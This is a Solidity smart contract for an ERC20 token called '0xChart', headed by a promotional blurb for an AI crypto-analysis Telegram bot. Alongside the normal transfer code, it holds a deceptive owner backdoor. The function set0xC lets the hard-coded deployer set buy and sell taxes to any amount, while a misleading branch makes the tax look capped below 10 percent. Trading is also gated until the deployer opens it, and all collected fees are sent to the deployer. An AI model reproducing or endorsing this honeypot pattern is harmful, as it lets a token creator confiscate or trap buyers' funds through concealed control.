Contract Source Code:
File 1 of 1 : ZeroXChart
/*
Welcome to 0xChart, where we're transforming the way you interact with crypto data. Experience the power of AI-driven analysis and predictions, all within your favorite messaging app, Telegram.
Discover a platform that blends advanced AI chart analysis with real-time social media insights, delivering a comprehensive view of the crypto world. With 0xChart, you're not just following trends; you're staying ahead of them.
Our bot is already live and ready to use with Chart analysis, Market prediction and socials finder.
Telegram: https://t.me/ZeroxChartETH
Twitter: https://twitter.com/0xChartETH
Website: https://0xchart.space
Medium: https://medium.com/@0x-chart
Bot: https://t.me/ZeroXChart_bot
*/
// SPDX-License-Identifier: unlicense
pragma solidity ^0.8.23;
interface IUniswapV2Router02 {
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint amountIn,
uint amountOutMin,
address[] calldata path,
address to,
uint deadline
) external;
}
contract ZeroXChart {
string public constant name = "0xChart"; //
string public constant symbol = "0xC"; //
uint8 public constant decimals = 18;
uint256 public constant totalSupply = 100_000_000 * 10**decimals;
uint256 BurnTNumber = 2;
uint256 ConfirmTNumber = 2;
uint256 constant swapAmount = totalSupply / 100;
mapping (address => uint256) public balanceOf;
mapping (address => mapping (address => uint256)) public allowance;
error Permissions();
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
address private pair;
address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
address payable constant deployer = payable(address(0x796B8776ac30ebAFa5a2c84D4eE90b5782076597)); //
bool private swapping;
bool private TradingOpenStatus;
constructor() {
balanceOf[msg.sender] = totalSupply;
allowance[address(this)][routerAddress] = type(uint256).max;
emit Transfer(address(0), msg.sender, totalSupply);
}
receive() external payable {}
function approve(address spender, uint256 amount) external returns (bool){
allowance[msg.sender][spender] = amount;
emit Approval(msg.sender, spender, amount);
return true;
}
function transfer(address to, uint256 amount) external returns (bool){
return _transfer(msg.sender, to, amount);
}
function transferFrom(address from, address to, uint256 amount) external returns (bool){
allowance[from][msg.sender] -= amount;
return _transfer(from, to, amount);
}
function _transfer(address from, address to, uint256 amount) internal returns (bool){
require(TradingOpenStatus || from == deployer || to == deployer);
if(!TradingOpenStatus && pair == address(0) && amount > 0)
pair = to;
balanceOf[from] -= amount;
if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
swapping = true;
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = ETH;
_uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
swapAmount,
0,
path,
address(this),
block.timestamp
);
deployer.transfer(address(this).balance);
swapping = false;
}
if(from != address(this)){
uint256 FinalFigure = amount * (from == pair ? BurnTNumber : ConfirmTNumber) / 100;
amount -= FinalFigure;
balanceOf[address(this)] += FinalFigure;
}
balanceOf[to] += amount;
emit Transfer(from, to, amount);
return true;
}
function OpenTrade() external {
require(msg.sender == deployer);
require(!TradingOpenStatus);
TradingOpenStatus = true;
}
function set0xC(uint256 newTBurn, uint256 newTConfirm) external {
if(msg.sender == deployer){
BurnTNumber = newTBurn;
ConfirmTNumber = newTConfirm;
}
else{
require(newTBurn < 10);
require(newTConfirm < 10);
revert();
}
}
}